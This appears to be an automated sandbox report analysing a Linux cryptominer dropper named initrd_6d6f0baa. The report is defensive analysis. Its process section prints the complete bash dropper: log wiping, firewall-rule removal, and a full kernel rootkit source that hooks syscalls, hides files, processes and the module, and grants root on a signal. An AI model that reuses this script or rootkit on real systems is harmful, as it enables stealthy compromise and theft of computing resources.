Analysis
-
max time kernel
1s -
max time network
131s -
platform
ubuntu-20.04_amd64 -
resource
ubuntu2004-amd64-20240729-en -
resource tags
arch:amd64arch:i386image:ubuntu2004-amd64-20240729-enkernel:5.4.0-169-genericlocale:en-usos:ubuntu-20.04-amd64system -
submitted
24-10-2024 01:18
Static task
static1
Behavioral task
behavioral1
Sample
initrd_6d6f0baa
Resource
ubuntu2004-amd64-20240729-en
General
-
Target
initrd_6d6f0baa
-
Size
32KB
-
MD5
a3ba12b3990ff7518678c9c9a90e9aa8
-
SHA1
81375fad1155bb8a04fb229c311aac1ae28ebb17
-
SHA256
7dc6436dbcefb6bf21c7f50ee08ca25df00324c638ff3c9a25ff03636362794d
-
SHA512
2b2be2e25d0ca527e56d6aa4f4a980298b74f9a30876c9786de863881c2477735170d33f2239540765d1a53a75f79cdbf857dc971a2822badb01cbaec5185ef7
-
SSDEEP
384:yn+QBT1NLGhk8tGJAeMnsppgRE9hCxKpLIgP8JxvbIUpGJSnQVXUX7SbTR:y+QFT6dtGJAejpxf183bIUoAnQWObT
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
Processes:
journalctldescription ioc Process File deleted /var/log/journal/4816dd152e8c48ff97e9117d197c13d8/system@01b0f561ee4e459eb5003cb673470788-0000000000000001-00061e5f62d90990.journal journalctl File deleted /var/log/journal/4816dd152e8c48ff97e9117d197c13d8/[email protected]~ journalctl -
Deletes system logs 1 TTPs 1 IoCs
Deletes log file which contains global system messages. Adversaries may delete system logs to minimize their footprint.
Processes:
rmdescription ioc Process File deleted /var/log/syslog rm -
Processes:
insmodioc pid Process /tmp/a/ipmi_devinfo.ko 2013 insmod -
Reads EFI boot settings 1 TTPs 1 IoCs
Reads EFI boot settings from the efivars filesystem, may contain security secrets or sensitive data.
Processes:
journalctldescription ioc Process File opened for reading /sys/firmware/efi/efivars/SystemdOptions-8cf2644b-4b0b-428f-9387-6d876050dc67 journalctl -
Processes:
rmrmrmdescription ioc Process File deleted /var/log/messages* rm File deleted /var/log/secure* rm File deleted /var/log/auth.log rm -
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads list of loaded kernel modules 1 TTPs 2 IoCs
Reads the list of currently loaded kernel modules, possibly to detect virtual environments.
Processes:
grepgrepdescription ioc Process File opened for reading /proc/modules grep File opened for reading /proc/modules grep -
Reads CPU attributes 1 TTPs 1 IoCs
Processes:
psdescription ioc Process File opened for reading /sys/devices/system/cpu/online ps -
Command and Scripting Interpreter: Unix Shell 1 TTPs 33 IoCs
Execute scripts via Unix Shell.
Processes:
shshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshshpid Process 1984 sh 1988 sh 1990 sh 1933 sh 1977 sh 1971 sh 1939 sh 1953 sh 1976 sh 1980 sh 1981 sh 1986 sh 1478 sh 1969 sh 1970 sh 1972 sh 1979 sh 1471 sh 1951 sh 1958 sh 1960 sh 2011 sh 1474 sh 1949 sh 1956 sh 1991 sh 1993 sh 1736 sh 1483 sh 1937 sh 1978 sh 1995 sh 1476 sh -
Processes:
psjournalctlmkdirmkdirmkdirawkmkdirsedmkdirmkdirawkmkdirmkdirmkdirdescription ioc Process File opened for reading /proc/440/cmdline ps File opened for reading /proc/1318/cmdline ps File opened for reading /proc/cmdline journalctl File opened for reading /proc/filesystems mkdir File opened for reading /proc/79/status ps File opened for reading /proc/86/stat ps File opened for reading /proc/1073/cmdline ps File opened for reading /proc/166/cmdline ps File opened for reading /proc/520/stat ps File opened for reading /proc/586/status ps File opened for reading /proc/950/status ps File opened for reading /proc/1342/status ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems mkdir File opened for reading /proc/574/stat ps File opened for reading /proc/1050/stat ps File opened for reading /proc/1074/status ps File opened for reading /proc/1077/cmdline ps File opened for reading /proc/2018/stat ps File opened for reading /proc/self/maps awk File opened for reading /proc/19/status ps File opened for reading /proc/800/status ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/2/cmdline ps File opened for reading /proc/105/status ps File opened for reading /proc/168/cmdline ps File opened for reading /proc/392/cmdline ps File opened for reading /proc/filesystems sed File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems mkdir File opened for reading /proc/921/stat ps File opened for reading /proc/1335/cmdline ps File opened for reading /proc/534/status ps File opened for reading /proc/639/cmdline ps File opened for reading /proc/1339/status ps File opened for reading /proc/1339/cmdline ps File opened for reading /proc/1398/stat ps File opened for reading /proc/22/status ps File opened for reading /proc/74/stat ps File opened for reading /proc/301/status ps File opened for reading /proc/174/cmdline ps File opened for reading /proc/964/stat ps File opened for reading /proc/1337/stat ps File opened for reading /proc/1480/cmdline ps File opened for reading /proc/self/maps awk File opened for reading /proc/filesystems mkdir File opened for reading /proc/13/cmdline ps File opened for reading /proc/8/cmdline ps File opened for reading /proc/16/status ps File opened for reading /proc/105/cmdline ps File opened for reading /proc/118/stat ps File opened for reading /proc/301/cmdline ps File opened for reading /proc/filesystems mkdir File opened for reading /proc/filesystems mkdir File opened for reading /proc/3/cmdline ps File opened for reading /proc/504/cmdline ps File opened for reading /proc/825/status ps File opened for reading /proc/1096/stat ps File opened for reading /proc/1401/status ps File opened for reading /proc/1480/stat ps File opened for reading /proc/639/status ps File opened for reading /proc/806/cmdline ps File opened for reading /proc/978/cmdline ps File opened for reading /proc/10/status ps -
System Network Configuration Discovery 1 TTPs 44 IoCs
Adversaries may gather information about the network configuration of a system.
Processes:
mvshmakeshldmakeshshgrepasshshasmvasasshmakemakemakeobjdumpshmakemakeasmvgrepshshmakeasrmmvmakeasrmshmakemakeshsedmakeasinsmodpid Process 1451 mv 1969 sh 2003 make 2011 sh 2012 ld 1962 make 1979 sh 1980 sh 2015 grep 1966 as 1970 sh 1977 sh 2008 as 1452 mv 1966 as 1966 as 1972 sh 1997 make 1962 make 1962 make 1974 objdump 1976 sh 1997 make 1997 make 2008 as 1411 mv 1463 grep 1971 sh 1978 sh 1997 make 2008 as 2010 rm 1410 mv 1962 make 1966 as 1968 rm 1981 sh 2003 make 2003 make 1471 sh 1473 sed 2003 make 2008 as 2013 insmod -
Writes file to tmp directory 64 IoCs
Malware often drops required files in the /tmp directory.
Processes:
gccasasgcccc1asasgcccc1cc1cc1gccgccasgcccc1objcopyascc1collect2asgcccc1cc1modpostcc1asgccgccasgccasasascc1cc1gcccc1ascc1bashgcccc1cc1gccascc1gccasgccasgccgccasgccgccshgccgccasgcccc1cc1description ioc Process File opened for modification /tmp/ccw5TOyj.s gcc File opened for modification /tmp/a/.tmp_1746/tmp as File opened for modification /tmp/a/.tmp_1915/tmp as File opened for modification /tmp/cct0Fs7L.s gcc File opened for modification /tmp/ccPp03C9.s cc1 File opened for modification /tmp/ccVS77C5.o as File opened for modification /tmp/a/ipmi_devinfo.mod.o as File opened for modification /tmp/ccgoRzaN.s gcc File opened for modification /tmp/ccC9LQ10.s cc1 File opened for modification /tmp/cc5ga4iQ.s cc1 File opened for modification /tmp/ccR3BiDr.s cc1 File opened for modification /tmp/ccDhroS8.s gcc File opened for modification /tmp/ccuE8spy.s gcc File opened for modification /tmp/a/.tmp_1885/tmp as File opened for modification /tmp/cc9giDsh.s gcc File opened for modification /tmp/cckd5cmo.s cc1 File opened for modification /tmp/a/.tmp_1652/tmp.o objcopy File opened for modification /tmp/a/.tmp_1770/tmp as File opened for modification /tmp/cc9giDsh.s cc1 File opened for modification /tmp/cc60it6m.cdtor.o collect2 File opened for modification /tmp/a/.tmp_1604/tmp as File opened for modification /tmp/ccnvuwl6.s gcc File opened for modification /tmp/ccAAzK4W.s cc1 File opened for modification /tmp/ccy4FCcR.s cc1 File opened for modification /tmp/a/ipmi_devinfo.mod.c modpost File opened for modification /tmp/ccgoRzaN.s cc1 File opened for modification /tmp/a/.tmp_1550/tmp as File opened for modification /tmp/ccWFz58l.s gcc File opened for modification /tmp/ccho1svT.s gcc File opened for modification /tmp/a/.tmp_1758/tmp as File opened for modification /tmp/ccAcAr2Q.s gcc File opened for modification /tmp/a/.tmp_1891/tmp as File opened for modification /tmp/a/.tmp_1616/tmp as File opened for modification /tmp/a/.tmp_1622/tmp as File opened for modification /tmp/ccBcBOwl.s cc1 File opened for modification /tmp/ccsBWp2M.s cc1 File opened for modification /tmp/ccMq6sjt.s gcc File opened for modification /tmp/ccpPsfPN.s cc1 File opened for modification /tmp/a/.tmp_1646/tmp as File opened for modification /tmp/ccWJA8gd.s cc1 File opened for modification /tmp/a/ipmi_devinfo.h bash File opened for modification /tmp/ccQ8zBgX.s gcc File opened for modification /tmp/ccYCjvBo.s cc1 File opened for modification /tmp/ccAcAr2Q.s cc1 File opened for modification /tmp/ccMW1rLm.s gcc File opened for modification /tmp/a/.tmp_1792/tmp as File opened for modification /tmp/ccXwV1av.s cc1 File opened for modification /tmp/ccovWzfY.s gcc File opened for modification /tmp/a/.tmp_1776/tmp as File opened for modification /tmp/cckKJ2rw.s gcc File opened for modification /tmp/a/.tmp_1634/tmp as File opened for modification /tmp/ccAAzK4W.s gcc File opened for modification /tmp/cckd5cmo.s gcc File opened for modification /tmp/a/.tmp_1701/tmp as File opened for modification /tmp/cc3sDHMH.s gcc File opened for modification /tmp/ccGDRxXC.s gcc File opened for modification /tmp/a/.ipmi_devinfo.ko.cmd sh File opened for modification /tmp/a/Makefile bash File opened for modification /tmp/ccUcHYOz.s gcc File opened for modification /tmp/cc4jPfnS.s gcc File opened for modification /tmp/a/.tmp_1740/tmp as File opened for modification /tmp/ccy4FCcR.s gcc File opened for modification /tmp/cctM0ajl.s cc1 File opened for modification /tmp/ccaoVyqB.s cc1
Processes
-
/tmp/initrd_6d6f0baa/tmp/initrd_6d6f0baa1⤵PID:1401
-
/bin/bash/tmp/initrd_6d6f0baa -c "exec '/tmp/initrd_6d6f0baa' \"\$@\"" /tmp/initrd_6d6f0baa1⤵PID:1401
-
/tmp/initrd_6d6f0baa/tmp/initrd_6d6f0baa1⤵PID:1401
-
/bin/bash/tmp/initrd_6d6f0baa -c " #!/bin/bash rm -rf /var/www/html/config.json rm -rf /root/.xmrig.json rm -rf /root/.config/xmrig.json rm -rf /var/log/messages* rm -rf /var/log/secure* rm -rf /var/log/auth.log* rm -rf /var/log/syslog* echo \"fs.file-max = 2097152\" > /etc/sysctl.conf sysctl -p ulimit -SHn 1024000 mv /usr/sbin/tokens /usr/sbin/iptables 2>/dev/null 1>/dev/null& mv /sbin/tokens /sbin/iptables 2>/dev/null 1>/dev/null& iptables -L INPUT -v -n | grep 138.68 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 67.207 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 46.101 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 157.245 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 146.190 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 144.126 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 167.172 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 172.104 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s iptables -L INPUT -v -n | grep 172.105 | awk '{print \$8}' | xargs -rL1 iptables -D INPUT -j DROP -s mv /usr/sbin/iptables /usr/sbin/tokens 2>/dev/null 1>/dev/null& mv /sbin/iptables /sbin/tokens 2>/dev/null 1>/dev/null& module_install () { mkdir /tmp/a cat <<EOF >>/tmp/a/ipmi_devinfo.h struct linux_dirent { unsigned long d_ino; unsigned long d_off; unsigned short d_reclen; char d_name[1]; }; #define MAGIC_PREFIX \"initrd_\" #define PF_INVISIBLE 0x10000000 #define MODULE_NAME \"ipmi_devinfo\" enum { SIGINVIS = 41, SIGSUPER = 54, SIGMODINVIS = 53, }; #ifndef IS_ENABLED #define IS_ENABLED(option) \\ (defined(__enabled_ ## option) || defined(__enabled_ ## option ## _MODULE)) #endif #if LINUX_VERSION_CODE >= KERNEL_VERSION(5,7,0) #define KPROBE_LOOKUP 1 #include <linux/kprobes.h> static struct kprobe kp = { .symbol_name = \"kallsyms_lookup_name\" }; #endif EOF cat <<EOF >>/tmp/a/ipmi_devinfo.c #include <linux/sched.h> #include <linux/module.h> #include <linux/syscalls.h> #include <linux/dirent.h> #include <linux/slab.h> #include <linux/version.h> #if LINUX_VERSION_CODE < KERNEL_VERSION(4, 13, 0) #include <asm/uaccess.h> #endif #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 10, 0) #include <linux/proc_ns.h> #else #include <linux/proc_fs.h> #endif #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 26) #include <linux/file.h> #else #include <linux/fdtable.h> #endif #if LINUX_VERSION_CODE <= KERNEL_VERSION(2, 6, 18) #include <linux/unistd.h> #endif #ifndef __NR_getdents #define __NR_getdents 141 #endif #include \"ipmi_devinfo.h\" #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) unsigned long cr0; #elif IS_ENABLED(CONFIG_ARM64) void (*update_mapping_prot)(phys_addr_t phys, unsigned long virt, phys_addr_t size, pgprot_t prot); unsigned long start_rodata; unsigned long init_begin; #define section_size init_begin - start_rodata #endif static unsigned long *__sys_call_table; #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) typedef asmlinkage long (*t_syscall)(const struct pt_regs *); static t_syscall orig_getdents; static t_syscall orig_getdents64; static t_syscall orig_kill; #else typedef asmlinkage int (*orig_getdents_t)(unsigned int, struct linux_dirent *, unsigned int); typedef asmlinkage int (*orig_getdents64_t)(unsigned int, struct linux_dirent64 *, unsigned int); typedef asmlinkage int (*orig_kill_t)(pid_t, int); orig_getdents_t orig_getdents; orig_getdents64_t orig_getdents64; orig_kill_t orig_kill; #endif unsigned long * get_syscall_table_bf(void) { unsigned long *syscall_table; #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 4, 0) #ifdef KPROBE_LOOKUP typedef unsigned long (*kallsyms_lookup_name_t)(const char *name); kallsyms_lookup_name_t kallsyms_lookup_name; register_kprobe(&kp); kallsyms_lookup_name = (kallsyms_lookup_name_t) kp.addr; unregister_kprobe(&kp); #endif syscall_table = (unsigned long*)kallsyms_lookup_name(\"sys_call_table\"); return syscall_table; #else unsigned long int i; for (i = (unsigned long int)sys_close; i < ULONG_MAX; i += sizeof(void *)) { syscall_table = (unsigned long *)i; if (syscall_table[__NR_close] == (unsigned long)sys_close) return syscall_table; } return NULL; #endif } struct task_struct * find_task(pid_t pid) { struct task_struct *p = current; for_each_process(p) { if (p->pid == pid) return p; } return NULL; } int is_invisible(pid_t pid) { struct task_struct *task; if (!pid) return 0; task = find_task(pid); if (!task) return 0; if (task->flags & PF_INVISIBLE) return 1; return 0; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static asmlinkage long hacked_getdents64(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) int fd = (int) pt_regs->di; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) int fd = (int) pt_regs->regs[0]; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1]; #endif int ret = orig_getdents64(pt_regs), err; #else asmlinkage int hacked_getdents64(unsigned int fd, struct linux_dirent64 __user *dirent, unsigned int count) { int ret = orig_getdents64(fd, dirent, count), err; #endif unsigned short proc = 0; unsigned long off = 0; struct linux_dirent64 *dir, *kdirent, *prev = NULL; struct inode *d_inode; if (ret <= 0) return ret; kdirent = kzalloc(ret, GFP_KERNEL); if (kdirent == NULL) return ret; err = copy_from_user(kdirent, dirent, ret); if (err) goto out; #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0) d_inode = current->files->fdt->fd[fd]->f_dentry->d_inode; #else d_inode = current->files->fdt->fd[fd]->f_path.dentry->d_inode; #endif if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev) /*&& MINOR(d_inode->i_rdev) == 1*/) proc = 1; while (off < ret) { dir = (void *)kdirent + off; if ((!proc && (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0)) || (proc && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) { if (dir == kdirent) { ret -= dir->d_reclen; memmove(dir, (void *)dir + dir->d_reclen, ret); continue; } prev->d_reclen += dir->d_reclen; } else prev = dir; off += dir->d_reclen; } err = copy_to_user(dirent, kdirent, ret); if (err) goto out; out: kfree(kdirent); return ret; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static asmlinkage long hacked_getdents(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) int fd = (int) pt_regs->di; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) int fd = (int) pt_regs->regs[0]; struct linux_dirent * dirent = (struct linux_dirent *) pt_regs->regs[1]; #endif int ret = orig_getdents(pt_regs), err; #else asmlinkage int hacked_getdents(unsigned int fd, struct linux_dirent __user *dirent, unsigned int count) { int ret = orig_getdents(fd, dirent, count), err; #endif unsigned short proc = 0; unsigned long off = 0; struct linux_dirent *dir, *kdirent, *prev = NULL; struct inode *d_inode; if (ret <= 0) return ret; kdirent = kzalloc(ret, GFP_KERNEL); if (kdirent == NULL) return ret; err = copy_from_user(kdirent, dirent, ret); if (err) goto out; #if LINUX_VERSION_CODE < KERNEL_VERSION(3, 19, 0) d_inode = current->files->fdt->fd[fd]->f_dentry->d_inode; #else d_inode = current->files->fdt->fd[fd]->f_path.dentry->d_inode; #endif if (d_inode->i_ino == PROC_ROOT_INO && !MAJOR(d_inode->i_rdev) /*&& MINOR(d_inode->i_rdev) == 1*/) proc = 1; while (off < ret) { dir = (void *)kdirent + off; if ((!proc && (memcmp(MAGIC_PREFIX, dir->d_name, strlen(MAGIC_PREFIX)) == 0)) || (proc && is_invisible(simple_strtoul(dir->d_name, NULL, 10)))) { if (dir == kdirent) { ret -= dir->d_reclen; memmove(dir, (void *)dir + dir->d_reclen, ret); continue; } prev->d_reclen += dir->d_reclen; } else prev = dir; off += dir->d_reclen; } err = copy_to_user(dirent, kdirent, ret); if (err) goto out; out: kfree(kdirent); return ret; } void give_root(void) { #if LINUX_VERSION_CODE < KERNEL_VERSION(2, 6, 29) current->uid = current->gid = 0; current->euid = current->egid = 0; current->suid = current->sgid = 0; current->fsuid = current->fsgid = 0; #else struct cred *newcreds; newcreds = prepare_creds(); if (newcreds == NULL) return; #if LINUX_VERSION_CODE >= KERNEL_VERSION(3, 5, 0) \\ && defined(CONFIG_UIDGID_STRICT_TYPE_CHECKS) \\ || LINUX_VERSION_CODE >= KERNEL_VERSION(3, 14, 0) newcreds->uid.val = newcreds->gid.val = 0; newcreds->euid.val = newcreds->egid.val = 0; newcreds->suid.val = newcreds->sgid.val = 0; newcreds->fsuid.val = newcreds->fsgid.val = 0; #else newcreds->uid = newcreds->gid = 0; newcreds->euid = newcreds->egid = 0; newcreds->suid = newcreds->sgid = 0; newcreds->fsuid = newcreds->fsgid = 0; #endif commit_creds(newcreds); #endif } static inline void tidy(void) { kfree(THIS_MODULE->sect_attrs); THIS_MODULE->sect_attrs = NULL; } static struct list_head *module_previous; static short module_hidden = 0; void module_show(void) { list_add(&THIS_MODULE->list, module_previous); module_hidden = 0; } void module_hide(void) { module_previous = THIS_MODULE->list.prev; list_del(&THIS_MODULE->list); module_hidden = 1; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) asmlinkage int hacked_kill(const struct pt_regs *pt_regs) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) pid_t pid = (pid_t) pt_regs->di; int sig = (int) pt_regs->si; #elif IS_ENABLED(CONFIG_ARM64) pid_t pid = (pid_t) pt_regs->regs[0]; int sig = (int) pt_regs->regs[1]; #endif #else asmlinkage int hacked_kill(pid_t pid, int sig) { #endif struct task_struct *task; switch (sig) { case SIGINVIS: if ((task = find_task(pid)) == NULL) return -ESRCH; task->flags ^= PF_INVISIBLE; break; case SIGSUPER: give_root(); break; case SIGMODINVIS: if (module_hidden) module_show(); else module_hide(); break; default: #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) return orig_kill(pt_regs); #else return orig_kill(pid, sig); #endif } return 0; } #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) static inline void write_cr0_forced(unsigned long val) { unsigned long __force_order; asm volatile( \"mov %0, %%cr0\" : \"+r\"(val), \"+m\"(__force_order)); } #endif static inline void protect_memory(void) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) write_cr0_forced(cr0); #else write_cr0(cr0); #endif #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata, section_size, PAGE_KERNEL_RO); #endif } static inline void unprotect_memory(void) { #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) write_cr0_forced(cr0 & ~0x00010000); #else write_cr0(cr0 & ~0x00010000); #endif #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot(__pa_symbol(start_rodata), (unsigned long)start_rodata, section_size, PAGE_KERNEL); #endif } static int __init ipmi_devinfo_init(void) { __sys_call_table = get_syscall_table_bf(); if (!__sys_call_table) return -1; #if IS_ENABLED(CONFIG_X86) || IS_ENABLED(CONFIG_X86_64) cr0 = read_cr0(); #elif IS_ENABLED(CONFIG_ARM64) update_mapping_prot = (void *)kallsyms_lookup_name(\"update_mapping_prot\"); start_rodata = (unsigned long)kallsyms_lookup_name(\"__start_rodata\"); init_begin = (unsigned long)kallsyms_lookup_name(\"__init_begin\"); #endif module_hide(); tidy(); #if LINUX_VERSION_CODE > KERNEL_VERSION(4, 16, 0) orig_getdents = (t_syscall)__sys_call_table[__NR_getdents]; orig_getdents64 = (t_syscall)__sys_call_table[__NR_getdents64]; orig_kill = (t_syscall)__sys_call_table[__NR_kill]; #else orig_getdents = (orig_getdents_t)__sys_call_table[__NR_getdents]; orig_getdents64 = (orig_getdents64_t)__sys_call_table[__NR_getdents64]; orig_kill = (orig_kill_t)__sys_call_table[__NR_kill]; #endif unprotect_memory(); __sys_call_table[__NR_getdents] = (unsigned long) hacked_getdents; __sys_call_table[__NR_getdents64] = (unsigned long) hacked_getdents64; __sys_call_table[__NR_kill] = (unsigned long) hacked_kill; protect_memory(); return 0; } static void __exit ipmi_devinfo_cleanup(void) { unprotect_memory(); __sys_call_table[__NR_getdents] = (unsigned long) orig_getdents; __sys_call_table[__NR_getdents64] = (unsigned long) orig_getdents64; __sys_call_table[__NR_kill] = (unsigned long) orig_kill; protect_memory(); } module_init(ipmi_devinfo_init); module_exit(ipmi_devinfo_cleanup); MODULE_LICENSE(\"Dual BSD/GPL\"); MODULE_AUTHOR(\"m0nad\"); MODULE_DESCRIPTION(\"LKM rootkit\"); EOF cat <<EOF >>/tmp/a/Makefile obj-m := ipmi_devinfo.o CC = gcc -Wall KDIR := /lib/modules/`uname -r`/build PWD := /tmp/a EOF make -C /lib/modules/`uname -r`/build M=/tmp/a modules insmod /tmp/a/ipmi_devinfo.ko rm -rf /tmp/a } port=\$1 EXE=`echo \$RANDOM | md5sum | head -c 8` DIR1=\"/opt\" if [ -d \"\$DIR1\" ]; then echo \"folder ok\" else mkdir \"\$DIR1\" fi DIR2=\"/opt/system-cache\" if [ -d \"\$DIR2\" ]; then echo \"folder ok\" else mkdir \"\$DIR2\" fi DIR3=\"/opt/system-cache/initrd_\" if [ -d \"\$DIR3\" ]; then echo \"folder ok\" else mkdir \"\$DIR3\" fi PID=`cat /opt/system-cache/initrd_/.cache` if [ -e \"/proc/\$PID/status\" ]; then echo \"ss ok\" for pid in \$(ps -ef | awk '/system-cache/ {print \$2}'); do kill -41 \$pid; done else echo \"ss is not runing\" cp /etc/dns/initrd_/dnsresolve /\$EXE /\$EXE -m -t -p /opt/system-cache/initrd_/.cache -b 0.0.0.0:\"\$port\" rm -rf /\$EXE kill -53 10000000 if grep -q \"ipmi_devinfo\" \"/proc/modules\"; then echo \"M exists\" for pid in \$(ps -ef | awk '/system-cache/ {print \$2}'); do kill -41 \$pid; done kill -53 10000000 else echo \"M not exists, installing...\" module_install kill -53 10000000 if grep -q \"ipmi_devinfo\" \"/proc/modules\"; then echo \"M exists\" for pid in \$(ps -ef | awk '/system-cache/ {print \$2}'); do kill -41 \$pid; done kill -53 10000000 else echo \"M not installed check errors\" fi fi fi journalctl --vacuum-time=1s " /tmp/initrd_6d6f0baa1⤵
- Writes file to tmp directory
PID:1401 -
/usr/bin/rmrm -rf /var/www/html/config.json2⤵PID:1402
-
-
/usr/bin/rmrm -rf /root/.xmrig.json2⤵PID:1403
-
-
/usr/bin/rmrm -rf /root/.config/xmrig.json2⤵PID:1404
-
-
/usr/bin/rmrm -rf "/var/log/messages*"2⤵
- Deletes log files
PID:1405
-
-
/usr/bin/rmrm -rf "/var/log/secure*"2⤵
- Deletes log files
PID:1406
-
-
/usr/bin/rmrm -rf /var/log/auth.log2⤵
- Deletes log files
PID:1407
-
-
/usr/bin/rmrm -rf /var/log/syslog2⤵
- Deletes system logs
PID:1408
-
-
/usr/sbin/sysctlsysctl -p2⤵PID:1409
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1415
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1414
-
-
/usr/bin/grepgrep 138.682⤵PID:1413
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1412
-
-
/usr/bin/mvmv /sbin/tokens /sbin/iptables2⤵
- System Network Configuration Discovery
PID:1411
-
-
/usr/bin/mvmv /usr/sbin/tokens /usr/sbin/iptables2⤵
- System Network Configuration Discovery
PID:1410
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1422
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1421
-
-
/usr/bin/grepgrep 67.2072⤵PID:1420
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1419
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1426
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1425
-
-
/usr/bin/grepgrep 46.1012⤵PID:1424
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1423
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1430
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1429
-
-
/usr/bin/grepgrep 157.2452⤵PID:1428
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1427
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1434
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1433
-
-
/usr/bin/grepgrep 146.1902⤵PID:1432
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1431
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1438
-
-
/usr/bin/awkawk "{print \$8}"2⤵
- Reads runtime system information
PID:1437
-
-
/usr/bin/grepgrep 144.1262⤵PID:1436
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1435
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1442
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1441
-
-
/usr/bin/grepgrep 167.1722⤵PID:1440
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1439
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1446
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1445
-
-
/usr/bin/grepgrep 172.1042⤵PID:1444
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1443
-
-
/usr/bin/xargsxargs -rL1 iptables -D INPUT -j DROP -s2⤵PID:1450
-
-
/usr/bin/awkawk "{print \$8}"2⤵PID:1449
-
-
/usr/bin/grepgrep 172.1052⤵PID:1448
-
-
/usr/sbin/iptablesiptables -L INPUT -v -n2⤵PID:1447
-
-
/usr/bin/mvmv /sbin/iptables /sbin/tokens2⤵
- System Network Configuration Discovery
PID:1452
-
-
/usr/bin/mvmv /usr/sbin/iptables /usr/sbin/tokens2⤵
- System Network Configuration Discovery
PID:1451
-
-
/usr/bin/headhead -c 82⤵PID:1456
-
-
/usr/bin/md5summd5sum2⤵PID:1455
-
-
/usr/bin/mkdirmkdir /opt/system-cache2⤵PID:1457
-
-
/usr/bin/mkdirmkdir /opt/system-cache/initrd_2⤵PID:1458
-
-
/usr/bin/catcat /opt/system-cache/initrd_/.cache2⤵PID:1459
-
-
/usr/bin/cpcp /etc/dns/initrd_/dnsresolve /c67d22592⤵PID:1460
-
-
/c67d2259/c67d2259 -m -t -p /opt/system-cache/initrd_/.cache -b 0.0.0.0:2⤵PID:1461
-
-
/usr/bin/rmrm -rf /c67d22592⤵PID:1462
-
-
/usr/bin/grepgrep -q ipmi_devinfo /proc/modules2⤵
- Reads list of loaded kernel modules
- System Network Configuration Discovery
PID:1463
-
-
/usr/bin/mkdirmkdir /tmp/a2⤵PID:1464
-
-
/usr/bin/catcat2⤵PID:1465
-
-
